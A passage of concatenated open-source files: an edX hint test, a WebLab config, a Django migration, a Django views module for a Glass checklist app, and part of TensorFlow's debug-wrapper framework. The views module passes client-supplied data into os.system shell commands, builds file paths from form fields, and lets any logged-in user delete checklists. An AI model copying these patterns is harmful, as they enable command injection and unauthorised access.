'expected_string': '<div class="feedback-hint-correct"><div class="hint-label">Correct: </div><div class="hint-text">AAABBB2</div></div>'},
{'problem_id': u'1_4_1', 'choice': 'not going to match',
'expected_string': ''},
)
@unpack
def test_dropdown_hints(self, problem_id, choice, expected_string):
hint = self.get_hint(problem_id, choice)
self.assertEqual(hint, expected_string)
class ErrorConditionsTest(HintTest):
"""
Erroneous xml should raise exception.
"""
def test_error_conditions_illegal_element(self):
xml_with_errors = load_fixture('extended_hints_with_errors.xml')
with self.assertRaises(Exception):
new_loncapa_problem(xml_with_errors) # this problem is improperly constructed
| agpl-3.0 |
porduna/weblabdeusto | server/launch/sample_balanced2_concurrent_experiments/main_machine/lab_and_experiment1/experiment2/server_config.py | 968 | 1526 | #!/usr/bin/env python
#-*-*- encoding: utf-8 -*-*-
weblab_xilinx_experiment_xilinx_device = 'FPGA'
weblab_xilinx_experiment_port_number = 1
# This should be something like this:
# import os as _os
# xilinx_home = _os.getenv('XILINX_HOME')
# if xilinx_home == None:
# if _os.name == 'nt':
# xilinx_home = r'C:\Program Files\Xilinx'
# elif _os.name == 'posix':
# xilinx_home = r"/home/nctrun/Xilinx"
#
# if _os.name == 'nt':
# xilinx_impact_full_path = [xilinx_home + r'\bin\nt\impact']
# elif _os.name == 'posix':
# xilinx_impact_full_path = [xilinx_home + r'/bin/lin/impact']
# But for testing we are going to fake it:
xilinx_home = "."
xilinx_impact_full_path = ["python","./tests/unit/weblab/experiment/devices/xilinx_impact/fake_impact.py" ]
xilinx_device_to_program = 'XilinxImpact' # 'JTagBlazer', 'DigilentAdept'
xilinx_device_to_send_commands = 'SerialPort' # 'HttpDevice'
digilent_adept_full_path = ["python","./test/unit/weblab/experiment/devices/digilent_adept/fake_digilent_adept.py" ]
digilent_adept_batch_content = """something with the variable $FILE"""
xilinx_http_device_ip_FPGA = "192.168.50.138"
xilinx_http_device_port_FPGA = 80
xilinx_http_device_app_FPGA = ""
xilinx_batch_content_FPGA = """setMode -bs
setCable -port auto
addDevice -position 1 -file $FILE
Program -p 1
exit
"""
# Though it is not really a FPGA, the webcam url var name depends on the device,
# specified above.
fpga_webcam_url = '''https://www.weblab.deusto.es/webcam/fpga0/image.jpg'''
| bsd-2-clause |
kartta-labs/noter-backend | noter_backend/main/migrations/0001_initial.py | 1 | 2952 | # Generated by Django 3.0.8 on 2020-08-13 19:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import main.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BasicUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('display_name', models.CharField(blank=True, default='', max_length=100)),
('email', models.EmailField(max_length=512, unique=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, default='', max_length=100)),
('labels_json', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='projects_by_user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uploaded_at', models.DateTimeField(auto_now_add=True)),
('title', models.CharField(blank=True, default='', max_length=100)),
('description', models.TextField(blank=True, default='')),
('image', models.ImageField(upload_to=main.models.generate_uuid_filename, verbose_name='Image')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images_by_user', to=settings.AUTH_USER_MODEL)),
('part_of_project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='images_in_project', to='main.Project')),
],
),
migrations.CreateModel(
name='AnnotationsJson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content_json', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('on_image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='annotations_by_image', to='main.Image')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='annotations_by_user', to=settings.AUTH_USER_MODEL)),
],
),
]
| apache-2.0 |
timothyclemans/checklistsforglass | checklistsforglass/views.py | 1 | 13909 | from django.shortcuts import render
from django.shortcuts import render_to_response
from django.db.models.loading import get_model
from django.http import HttpResponse, HttpResponseRedirect
from models import Checklist, ChecklistV2, ChecklistElement, Device, UnregisteredDevice, Data, AuditTrail
from django.contrib.auth.models import User
import json
from django.template import RequestContext
import traceback
import sys
from django.contrib.auth.decorators import login_required
import re
from django.utils.text import compress_string
from django.utils.cache import patch_vary_headers
from django import http
try:
import settings
XS_SHARING_ALLOWED_ORIGINS = settings.XS_SHARING_ALLOWED_ORIGINS
XS_SHARING_ALLOWED_METHODS = settings.XS_SHARING_ALLOWED_METHODS
except:
XS_SHARING_ALLOWED_ORIGINS = '*'
XS_SHARING_ALLOWED_METHODS = ['POST','GET','OPTIONS', 'PUT', 'DELETE']
class XsSharing(object):
"""
This middleware allows cross-domain XHR using the html5 postMessage API.
Access-Control-Allow-Origin: http://foo.example
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
"""
def process_request(self, request):
if 'HTTP_ACCESS_CONTROL_REQUEST_METHOD' in request.META:
response = http.HttpResponse()
response['Access-Control-Allow-Origin'] = XS_SHARING_ALLOWED_ORIGINS
response['Access-Control-Allow-Methods'] = ",".join( XS_SHARING_ALLOWED_METHODS )
return response
return None
def process_response(self, request, response):
# Avoid unnecessary work
if response.has_header('Access-Control-Allow-Origin'):
return response
response['Access-Control-Allow-Origin'] = XS_SHARING_ALLOWED_ORIGINS
response['Access-Control-Allow-Methods'] = ",".join( XS_SHARING_ALLOWED_METHODS )
return response
class ProcessExceptionMiddleware(object):
def process_exception(self, request, exception):
print exception # or log, or whatever.
# print traceback
print '\n'.join(traceback.format_exception(*sys.exc_info()))
def home(request):
if request.user.is_authenticated():
context = {'user': request.user, 'checklists_user_created': Checklist.objects.filter(author=request.user), 'checklists_user_createdV2': ChecklistV2.objects.filter(author=request.user)}
else:
context = {}
return render_to_response("home.html", context)
def get_full_json(request):
import re
the_json = request.POST['json']
matches = re.findall('{"type":"link","checklist_id":\d+}', the_json)
for match in matches:
m = re.search('{"type":"link","checklist_id":(?P<id>\d+)}', match)
checklist = ChecklistV2.objects.get(id=int(m.group('id')))
the_json = the_json.replace(match, checklist.json[1:-1])
return HttpResponse(the_json)
def get_full_checklist(request, checklist_id):
import re
checklist = ChecklistV2.objects.get(id=checklist_id)
the_json = checklist.json
matches = re.findall('{"type":"link","checklist_id":\d+}', the_json)
for match in matches:
m = re.search('{"type":"link","checklist_id":(?P<id>\d+)}', match)
checklist = ChecklistV2.objects.get(id=int(m.group('id')))
the_json = the_json.replace(match, checklist.json[1:-1])
the_json = the_json.replace("null", "")
the_json = the_json.replace("[,", "[")
the_json = the_json.replace(",]", "]")
the_json = the_json.replace(",,", ",")
return HttpResponse(the_json, content_type="application/json")
#@login_required
def audit_trail(request, data_id):
data = json.loads(Data.objects.get(id=data_id).data)
context = RequestContext(request, {'data': data})
return render_to_response('audit_trail.html', context)
def audit_trails(request):
audit_trails = AuditTrail.objects.filter(user=request.user)
context = RequestContext(request, {'audit_trails': audit_trails})
return render_to_response('audit_trails.html', context)
@login_required
def edit_checklist(request, checklist_id):
if request.POST:
print request.FILES
print request.POST
checklist = Checklist.objects.get(id=checklist_id)
checklist.name = request.POST['name']
checklist.delete_elements()
matches = {}
if 'mass' in request.POST:
print request.POST['mass']
for i, item in enumerate(request.POST['mass'].split('\n')):
print i, item
checklist_element = ChecklistElement(checklist=checklist, text=item.strip(), order=i)
checklist_element.save()
else:
for i, element in enumerate(sorted([j for j in request.POST.keys() if j.startswith('text_')])):
checklist_element = ChecklistElement(checklist=checklist, text=request.POST[element], order=i)
checklist_element.save()
matches[element[5:]] = checklist_element.id
print checklist.name
for i in request.FILES:
f = request.FILES[i]
ext = f.name[f.name.index('.')+1:]
checklist_element = ChecklistElement.objects.get(id=matches[i[6:]])
checklist_element.image = f
checklist_element.save()
#with open('/home/tim/checklistsforglass/checklist_images/%s.%s' % (matches[i[6:]], ext), 'wb+') as destination:
# for chunk in f.chunks():
# destination.write(chunk)
checklist.save()
context = RequestContext(request, {'checklist': Checklist.objects.get(id=checklist_id)})
return render_to_response("edit_checklist.html", context)
def save_image(request, checklist_id):
if request.POST:
print request.FILES;
f = request.FILES['file'];
file_name = request.POST['file_name']
file_name = file_name.lower()
file_name.replace(' ', '_')
imagef = open('/home/tim/checklistsforglass/media/images/%s_%s.jpg' % (checklist_id, file_name), 'w');
imagef.write(f.read())
imagef.close()
return HttpResponseRedirect('/edit_checklistV2/%s/' % (checklist_id))
else:
context = RequestContext(request, {})
return render_to_response('save_image.html', context)
#@login_required
def edit_checklistV2(request, checklist_id):
if request.POST:
print request.FILES
print request.POST
checklist = ChecklistV2.objects.get(id=checklist_id)
if (request.user != checklist.author):
return HttpResponse('not the author')
checklist.name = request.POST['name']
checklist.json = request.POST['json']
matches = {}
checklist.save()
if request.user.is_authenticated():
from os import listdir
from os.path import isfile, join
images = [ f for f in listdir('/home/tim/checklistsforglass/media/images/') if isfile(join('/home/tim/checklistsforglass/media/images/',f)) if f.startswith(str(checklist_id)) ]
context = RequestContext(request, {'checklist': ChecklistV2.objects.get(id=checklist_id), 'page': 'V2', 'checklists': ChecklistV2.objects.filter(author=request.user), 'images': images})
else:
context = RequestContext(request, {'checklist': ChecklistV2.objects.get(id=checklist_id), 'page': 'V2', 'checklists': ChecklistV2.objects.all(),})
return render_to_response("edit_checklistV2.html", context)
@login_required
def create_checklistV2(request):
print 'Create checklist V2: '+str(request.POST)
if request.POST:
print request.FILES
print request.POST
checklist = ChecklistV2(name=request.POST['name'], author=request.user, json=request.POST['json'])
checklist.save()
return HttpResponse(str(checklist.id))
context = RequestContext(request, {'action': 'create', 'page': 'V2', 'checklists': ChecklistV2.objects.filter(author=request.user),})
return render_to_response("edit_checklistV2.html", context)
@login_required
def create_checklist(request):
if request.POST:
print request.FILES
print request.POST
checklist = Checklist(name=request.POST['name'], author=request.user)
checklist.save()
if 'mass' in request.POST:
print request.POST['mass']
for i, item in enumerate(request.POST['mass'].split('\n')):
print i, item
checklist_element = ChecklistElement(checklist=checklist, text=item.strip(), order=i)
checklist_element.save()
else:
matches = {}
for i, element in enumerate(sorted([j for j in request.POST.keys() if j.startswith('text_')])):
checklist_element = ChecklistElement(checklist=checklist, text=request.POST[element], order=i)
checklist_element.save()
matches[element[5:]] = checklist_element.id
print checklist.name
for i in request.FILES:
f = request.FILES[i]
ext = f.name[f.name.index('.')+1:]
checklist_element = ChecklistElement.objects.get(id=matches[i[6:]])
checklist_element.image = f
checklist_element.save()
checklist.save()
for device in Device.objects.filter(user=request.user):
device.checklists.add(checklist)
context = RequestContext(request, {'action': 'create'})
return render_to_response("edit_checklist.html", context)
@login_required
def delete_checklist(request, checklist_id):
checklist = Checklist.objects.get(id=checklist_id)
checklist.delete()
return HttpResponse('')
@login_required
def delete_checklistV2(request, checklist_id):
checklist = ChecklistV2.objects.get(id=checklist_id)
checklist.delete()
return HttpResponse('')
def is_registered(request, serial_number):
answer = serial_number in [i.serial_number for i in Device.objects.all()]
if answer == False and not serial_number in [i.serial_number for i in UnregisteredDevice.objects.all()]:
unregistered_device = UnregisteredDevice(serial_number=serial_number)
unregistered_device.save()
return HttpResponse(answer)
@login_required
def install(request):
context = {}
return render_to_response("install.html", context)
def unregistered_devices(request):
devices = json.dumps([i.serial_number for i in UnregisteredDevice.objects.all()])
return HttpResponse(devices, content_type="application/json")
def register_device(request, serial_number):
device = Device(serial_number=serial_number, user=request.user)
device.save()
unregistered_device = UnregisteredDevice.objects.get(serial_number=serial_number)
unregistered_device.delete()
return HttpResponse('')
def get_users_checklists(request, user_id):
checklists = {}
for checklist in ChecklistV2.objects.filter(author__id=user_id):
checklists[checklist.name] = checklist.id
devices = json.dumps(checklists)
return HttpResponse(devices, content_type="application/json")
def get_all_checklists(request):
checklists = {}
for checklist in ChecklistV2.objects.all():
checklists[checklist.name] = checklist.id
devices = json.dumps(checklists)
return HttpResponse(devices, content_type="application/json")
def get_checklists(request, serial_number):
device = Device.objects.get(serial_number=serial_number)
device.checklists.all()
devices = json.dumps([{'name': i.name, 'elements': i.get_elements()} for i in device.checklists.all()])
return HttpResponse(devices, content_type="application/json")
def export(request):
checklists = ChecklistV2.objects.filter(author=request.user)
cl = []
for checklist in checklists:
d = {}
d['name'] = checklist.name
d['description'] = checklist.description
d['video_url'] = checklist.video_url
d['json'] = checklist.json
cl.append(d)
return HttpResponse(json.dumps(cl), content_type="application/json")
def save_data(request):
data = Data(data=request.POST['data'])
data.save()
i = 0;
print len(json.loads(data.data))
new_data = []
for item in json.loads(data.data):
print item
if item['type'] == 'take_photo':
import os
os.system('echo "%s" > /home/tim/checklistsforglass/media/images/temp' % (item['photo']))
os.system('base64 -d /home/tim/checklistsforglass/media/images/temp > /home/tim/checklistsforglass/media/images/%s_%s.png' % (data.id, i))
item['photo'] = '%s_%s.png' % (data.id, i)
i += 1
new_data.append(item)
data.data = json.dumps(new_data)
data.save()
if 'user_id' in request.POST:
audit_trail = AuditTrail(data=data, user=User.objects.get(id=request.POST['user_id']), checklist=ChecklistV2.objects.get(id=request.POST['checklist_id']))
audit_trail.save()
return HttpResponse('saved')
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.http import HttpResponse, HttpResponseRedirect
from django.views.generic.base import View
from social_auth.exceptions import AuthFailed
from social_auth.views import complete
class AuthComplete(View):
def get(self, request, *args, **kwargs):
backend = kwargs.pop('backend')
try:
return complete(request, backend, *args, **kwargs)
except AuthFailed:
messages.error(request, "Your Google Apps domain isn't authorized for this app")
return HttpResponseRedirect(reverse('home'))
class LoginError(View):
def get(self, request, *args, **kwargs):
return HttpResponse(status=401)
| apache-2.0 |
koobonil/Boss2D | Boss2D/addon/tensorflow-1.2.1_for_boss/tensorflow/python/debug/wrappers/framework.py | 13 | 29952 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Framework of debug wrapper sessions.
A debug wrapper session is a wrapper around a TensorFlow Python Session.
The wrapper preserves the Session interface, most importantly the run() method,
while providing abilities to:
a) Intercept a run() call to a wrapped session and insert debug tensor watches
according to externally-specified debug URLs.
b) Release control to an external (i.e., non-Session) object before and after
the run() call, so that the external object can perform actions such as
launching a UI to let users inspect the intermediate tensors and partition
graphs from the run() call.
c) (To be implemented) Intercept a run() call and give control to DebugStepper
to let it perform stepping / continuing-to actions on the graph.
b) (To be implemented in a future CL) Enter an instruction loop to let an
external object (e.g., remote client) launch run() and cont() calls
remotely.
*** The lifetime of a debug wrapper session: ***
1) The wrapper session is created by calling the constructor with a
wrapped (normal) session as the argument:
wrapper = FooDebugWrapperSession(sess)
wherein FooDebugWrapperSession is a concrete subclass implementing the
abstract BaseDebugWrapperSession class below.
2) Near the end of the constructor call, the on_session_init() callback is
invoked, with a OnSessionInitRequest object as the argument. The object
carries the wrapped (normal) session object.
3) The callback handles the request and returns a OnSessionInitResponse
object with an action field, directing the wrapper session what to do next.
If the action field in the OnSessionInitResponse is PROCEED, the constuctor
returns. Control is released back to the caller of the constructor, which can
invoke run() method of wrapper session with the same syntax as a non-wrapped
session, e.g.,:
wrapper.run(fetches, feed_dict=feeds, options=run_options)
Below, A1 - A2 is the lifetime of a wrapper run() call if the action is
PROCEED:
A1) Right at the start of each run() call, the on_run_start() callback is
invoked, with an OnRunStartRequest object carrying information such as
the fetches, the feed dict, the run options and run metadata used in
this run call, along with a count of how many run calls has occurred
on this wrapper session. The callback then returns an OnRunStartResponse
object, of which the action field directs what the wrapper session
actually will do of the run() call.
If the action is DEBUG_RUN, a debugged (tensor-watched) run will ensue,
with the debug URLs supplied in the debug_urls field of the response.
These can be file:// or grpc:// URLs, for example.
If the action is NON_DEBUG_RUN, a non-debug (normal) run will ensue.
If the action is INVOKE_STEPPER, no run() call will be issued to the
wrapped session. But instead, a DebugStepper (i.e., "continuation
debugger") will be used to perform stepping / continue-to actions on
the graph.
TODO(cais): The event loop for the DebugStepper will request additional
callbacks including on_cont_start() and on_cont_end(). Add those.
A2) Right before the run() returns, the on_run_end() callback is invoked,
with an OnRunEndRequest object as the argument, which carries information
including the actual action performed in the warpper run() call and the
run_metadata from the run() call.
However, if the action field in OnSessionInitResponse is
REMOTE_INSTR_LOOP, the constructor will automatically invoke an instruction loop
that gives the control to a remote caller.
In the remote instruction loop, the following steps will happen:
B1) Callback on_instr_start() is invoked. The callback will return an
OnInstrStartResponse object with an action field which can order one of
the following actions:
i) a run() call with fetches, feeds and debug_urls specified.
ii) a DebugStepper cont() call with target specified.
iii) value overrides in the cached tensors from the DebugStepper.
iv) exit the instruction loop.
B2) The wrapper session carries out the action specified above.
B3) If still in the instruction loop, the wrapper session invokes the
on_instr_end() callback. After the on_instr_end() callback returns, jump
back to B1.
TODO(cais): Implemented the instruction loop in B1 - B3.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import re
import threading
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.debug.lib import stepper
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
# Helper function.
def _check_type(obj, expected_type):
"""Check if an object is of the expected type.
Args:
obj: The object being checked.
expected_type: (type) The expected type of obj.
Raises:
TypeError: If obj is not an instance of expected_type.
"""
if not isinstance(obj, expected_type):
raise TypeError("Expected type %s; got type %s" %
(expected_type, type(obj)))
class OnSessionInitRequest(object):
"""Request to an on-session-init callback.
This callback is invoked during the __init__ call to a debug-wrapper session.
"""
def __init__(self, sess):
"""Constructor.
Args:
sess: A tensorflow Session object.
"""
_check_type(sess, session.BaseSession)
self.session = sess
class OnSessionInitAction(object):
"""Enum-like values for possible action to take on session init."""
# Proceed, without special actions, in the wrapper session initialization.
# What action the wrapper session performs next is determined by the caller
# of the wrapper session. E.g., it can call run().
PROCEED = "proceed"
# Instead of letting the caller of the wrapper session determine what actions
# the wrapper session will perform next, enter a loop to receive instructions
# from a remote client.
# For example, TensorBoard visual debugger can use this action so that it can
# launch session.run() calls remotely.
REMOTE_INSTR_LOOP = "remote_instr_loop"
class OnSessionInitResponse(object):
"""Response from an on-session-init callback."""
def __init__(self, action):
"""Constructor.
Args:
action: (`OnSessionInitAction`) Debugger action to take on session init.
"""
_check_type(action, str)
self.action = action
class OnRunStartRequest(object):
"""Request to an on-run-start callback.
This callback is invoked during a run() call of the debug-wrapper
session, immediately after the run() call counter is incremented.
"""
def __init__(self, fetches, feed_dict, run_options, run_metadata,
run_call_count):
"""Constructor of `OnRunStartRequest`.
Args:
fetches: Fetch targets of the run() call.
feed_dict: The feed dictionary to the run() call.
run_options: RunOptions input to the run() call.
run_metadata: RunMetadata input to the run() call.
The above four arguments are identical to the input arguments to the
run() method of a non-wrapped TensorFlow session.
run_call_count: 1-based count of how many run calls (including this one)
has been invoked.
"""
self.fetches = fetches
self.feed_dict = feed_dict
self.run_options = run_options
self.run_metadata = run_metadata
self.run_call_count = run_call_count
class OnRunStartAction(object):
"""Enum-like values for possible action to take on start of a run() call."""
# Run once with debug tensor-watching.
DEBUG_RUN = "debug_run"
# Run once with profiler.
PROFILE_RUN = "profile_run"
# Run without debug tensor-watching.
NON_DEBUG_RUN = "non_debug_run"
# Instead of running the fetches as a whole, as would normally happen, invoke
# the (to-be-implemented) debug stepper.
# TODO(cais): Remove "to-be-implemented".
INVOKE_STEPPER = "invoke_stepper"
class OnRunStartResponse(object):
"""Request from an on-run-start callback.
The caller of the callback can use this response object to specify what
action the debug-wrapper session actually takes on the run() call.
"""
def __init__(self,
action,
debug_urls,
debug_ops="DebugIdentity",
node_name_regex_whitelist=None,
op_type_regex_whitelist=None,
tensor_dtype_regex_whitelist=None,
tolerate_debug_op_creation_failures=False):
"""Constructor of `OnRunStartResponse`.
Args:
action: (`OnRunStartAction`) the action actually taken by the wrapped
session for the run() call.
debug_urls: (`list` of `str`) debug_urls used in watching the tensors
during the run() call.
debug_ops: (`str` or `list` of `str`) Debug op(s) to be used by the
debugger.
node_name_regex_whitelist: Regular-expression whitelist for node
name.
op_type_regex_whitelist: Regular-expression whitelist for op type.
tensor_dtype_regex_whitelist: Regular-expression whitelist for tensor
dtype.
tolerate_debug_op_creation_failures: Whether debug op creation failures
are to be tolerated.
"""
_check_type(action, str)
self.action = action
_check_type(debug_urls, list)
self.debug_urls = debug_urls
self.debug_ops = debug_ops
self.node_name_regex_whitelist = node_name_regex_whitelist
self.op_type_regex_whitelist = op_type_regex_whitelist
self.tensor_dtype_regex_whitelist = tensor_dtype_regex_whitelist
self.tolerate_debug_op_creation_failures = (
tolerate_debug_op_creation_failures)
class OnRunEndRequest(object):
"""Request to an on-run-end callback.
The callback is invoked immediately before the wrapped run() call ends.
"""
def __init__(self,
performed_action,
run_metadata=None,
client_graph_def=None,
tf_error=None):
"""Constructor for `OnRunEndRequest`.
Args:
performed_action: (`OnRunStartAction`) Actually-performed action by the
debug-wrapper session.
run_metadata: run_metadata output from the run() call (if any).
client_graph_def: (GraphDef) GraphDef from the client side, i.e., from
the python front end of TensorFlow. Can be obtained with
session.graph.as_graph_def().
tf_error: (errors.OpError subtypes) TensorFlow OpError that occurred
during the run (if any).
"""
_check_type(performed_action, str)
self.performed_action = performed_action
if run_metadata is not None:
_check_type(run_metadata, config_pb2.RunMetadata)
self.run_metadata = run_metadata
self.client_graph_def = client_graph_def
self.tf_error = tf_error
class OnRunEndResponse(object):
"""Response from an on-run-end callback."""
def __init__(self):
# Currently only a placeholder.
pass
class BaseDebugWrapperSession(session.SessionInterface):
"""Base class of debug-wrapper session classes.
Concrete classes that inherit from this class need to implement the abstract
methods such as on_session_init, on_run_start and on_run_end.
"""
# TODO(cais): Add on_cont_start and on_cont_end callbacks once the stepper is
# is available.
def __init__(self, sess, thread_name_filter=None):
"""Constructor of `BaseDebugWrapperSession`.
Args:
sess: An (unwrapped) TensorFlow session instance.
thread_name_filter: Regular-expression filter (whitelist) for name(s) of
thread(s) on which the wrapper session will be active. This regular
expression is used in a start-anchored fashion on the thread name, i.e.,
by applying the `match` method of the compiled pattern. The default
`None` means that the wrapper session will be active on all threads.
E.g., r"MainThread$", r"QueueRunnerThread.*".
Raises:
ValueError: On invalid `OnSessionInitAction` value.
NotImplementedError: If a non-DirectSession sess object is received.
"""
_check_type(sess, session.BaseSession)
# The session being wrapped.
self._sess = sess
self._thread_name_filter_pattern = (re.compile(thread_name_filter)
if thread_name_filter else None)
# Keeps track of number of run calls that have been performed on this
# debug-wrapper session.
self._run_call_count = 0
# Invoke on-session-init callback.
response = self.on_session_init(OnSessionInitRequest(self._sess))
_check_type(response, OnSessionInitResponse)
if response.action == OnSessionInitAction.PROCEED:
pass
elif response.action == OnSessionInitAction.REMOTE_INSTR_LOOP:
# TODO(cais): Implement REMOTE_INSTR_LOOP
raise NotImplementedError(
"OnSessionInitAction REMOTE_INSTR_LOOP has not been "
"implemented.")
else:
raise ValueError(
"Invalid OnSessionInitAction value: %s" % response.action)
@property
def graph(self):
return self._sess.graph
@property
def graph_def(self):
return self._sess.graph_def
@property
def sess_str(self):
return self._sess.sess_str
@property
def session(self):
return self._sess
def as_default(self):
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Wrapper around Session.run() that inserts tensor watch options.
Args:
fetches: Same as the `fetches` arg to regular `Session.run()`.
feed_dict: Same as the `feed_dict` arg to regular `Session.run()`.
options: Same as the `options` arg to regular `Session.run()`.
run_metadata: Same as the `run_metadata` arg to regular `Session.run()`.
Returns:
Simply forwards the output of the wrapped `Session.run()` call.
Raises:
ValueError: On invalid `OnRunStartAction` value.
"""
self._run_call_count += 1
if self._is_disabled_thread():
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
# Invoke on-run-start callback and obtain response.
run_start_resp = self.on_run_start(
OnRunStartRequest(fetches, feed_dict, options, run_metadata,
self._run_call_count))
_check_type(run_start_resp, OnRunStartResponse)
if run_start_resp.action == OnRunStartAction.DEBUG_RUN:
# Decorate RunOption to fill in debugger tensor watch specifications.
decorated_run_options = options or config_pb2.RunOptions()
run_metadata = run_metadata or config_pb2.RunMetadata()
self._decorate_run_options_for_debug(
decorated_run_options,
run_start_resp.debug_urls,
debug_ops=run_start_resp.debug_ops,
node_name_regex_whitelist=run_start_resp.node_name_regex_whitelist,
op_type_regex_whitelist=run_start_resp.op_type_regex_whitelist,
tensor_dtype_regex_whitelist=(
run_start_resp.tensor_dtype_regex_whitelist),
tolerate_debug_op_creation_failures=(
run_start_resp.tolerate_debug_op_creation_failures))
# Invoke the run() method of the wrapped Session. Catch any TensorFlow
# runtime errors.
tf_error = None
try:
retvals = self._sess.run(fetches,
feed_dict=feed_dict,
options=decorated_run_options,
run_metadata=run_metadata)
except errors.OpError as op_error:
tf_error = op_error
retvals = op_error
run_end_req = OnRunEndRequest(
run_start_resp.action,
run_metadata=run_metadata,
client_graph_def=self._sess.graph.as_graph_def(),
tf_error=tf_error)
elif run_start_resp.action == OnRunStartAction.PROFILE_RUN:
decorated_run_options = options or config_pb2.RunOptions()
run_metadata = run_metadata or config_pb2.RunMetadata()
self._decorate_run_options_for_profile(decorated_run_options)
retvals = self._sess.run(fetches,
feed_dict=feed_dict,
options=decorated_run_options,
run_metadata=run_metadata)
run_end_req = OnRunEndRequest(
run_start_resp.action,
run_metadata=run_metadata,
client_graph_def=self._sess.graph.as_graph_def())
elif (run_start_resp.action == OnRunStartAction.NON_DEBUG_RUN or
run_start_resp.action == OnRunStartAction.INVOKE_STEPPER):
if run_start_resp.action == OnRunStartAction.INVOKE_STEPPER:
with stepper.NodeStepper(
self._sess, fetches, feed_dict) as node_stepper:
retvals = self.invoke_node_stepper(
node_stepper, restore_variable_values_on_exit=True)
# Invoke run() method of the wrapped session.
retvals = self._sess.run(
fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
# Prepare arg for the on-run-end callback.
run_end_req = OnRunEndRequest(run_start_resp.action)
else:
raise ValueError(
"Invalid OnRunStartAction value: %s" % run_start_resp.action)
# Invoke on-run-end callback and obtain response.
run_end_resp = self.on_run_end(run_end_req)
_check_type(run_end_resp, OnRunEndResponse)
# Currently run_end_resp is only a placeholder. No action is taken on it.
return retvals
def _is_disabled_thread(self):
thread_name = threading.current_thread().name or ""
return (self._thread_name_filter_pattern and
not self._thread_name_filter_pattern.match(thread_name))
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError(
"partial_run_setup is not implemented for debug-wrapper sessions.")
def partial_run(self, handle, fetches, feed_dict=None):
raise NotImplementedError(
"partial_run is not implemented for debug-wrapper sessions.")
def _decorate_run_options_for_debug(
self,
run_options,
debug_urls,
debug_ops="DebugIdentity",
node_name_regex_whitelist=None,
op_type_regex_whitelist=None,
tensor_dtype_regex_whitelist=None,
tolerate_debug_op_creation_failures=False):
"""Modify a RunOptions object for debug tensor watching.
Specifies request for outputting partition graphs. Adds
debug_tensor_watch_opts with proper debug URLs.
Args:
run_options: (RunOptions) the modified RunOptions object.
debug_urls: (list of str) debug URLs to be entered in run_options.
debug_tensor_watch_opts.
debug_ops: (str or list of str) debug op(s) to be used by the debugger.
node_name_regex_whitelist: Regular-expression whitelist for node
name.
op_type_regex_whitelist: Regular-expression whitelist for op type.
tensor_dtype_regex_whitelist: Regular-expression whitelist for tensor
dtype.
tolerate_debug_op_creation_failures: Whether debug op creation failures
are to be tolerated.
"""
run_options.output_partition_graphs = True
debug_utils.watch_graph(
run_options,
self._sess.graph,
debug_urls=debug_urls,
debug_ops=debug_ops,
node_name_regex_whitelist=node_name_regex_whitelist,
op_type_regex_whitelist=op_type_regex_whitelist,
tensor_dtype_regex_whitelist=tensor_dtype_regex_whitelist,
tolerate_debug_op_creation_failures=tolerate_debug_op_creation_failures)
def _decorate_run_options_for_profile(self, run_options):
"""Modify a RunOptions object for profiling TensorFlow graph execution.
Args:
run_options: (RunOptions) the modified RunOptions object.
"""
run_options.trace_level = config_pb2.RunOptions.FULL_TRACE
@abc.abstractmethod
def on_session_init(self, request):
"""Callback invoked during construction of the debug-wrapper session.
This is a blocking callback.
The invocation happens right before the constructor ends.
Args:
request: (`OnSessionInitRequest`) callback request carrying information
such as the session being wrapped.
Returns:
An instance of `OnSessionInitResponse`.
"""
@abc.abstractmethod
def on_run_start(self, request):
"""Callback invoked on run() calls to the debug-wrapper session.
This is a blocking callback.
The invocation happens after the wrapper's run() call is entered,
after an increment of run call counter.
Args:
request: (`OnRunStartRequest`) callback request object carrying
information about the run call such as the fetches, feed dict, run
options, run metadata, and how many `run()` calls to this wrapper
session have occurred.
Returns:
An instance of `OnRunStartResponse`, carrying information to
1) direct the wrapper session to perform a specified action (e.g., run
with or without debug tensor watching, invoking the stepper.)
2) debug URLs used to watch the tensors.
"""
@abc.abstractmethod
def on_run_end(self, request):
"""Callback invoked on run() calls to the debug-wrapper session.
This is a blocking callback.
The invocation happens right before the wrapper exits its run() call.
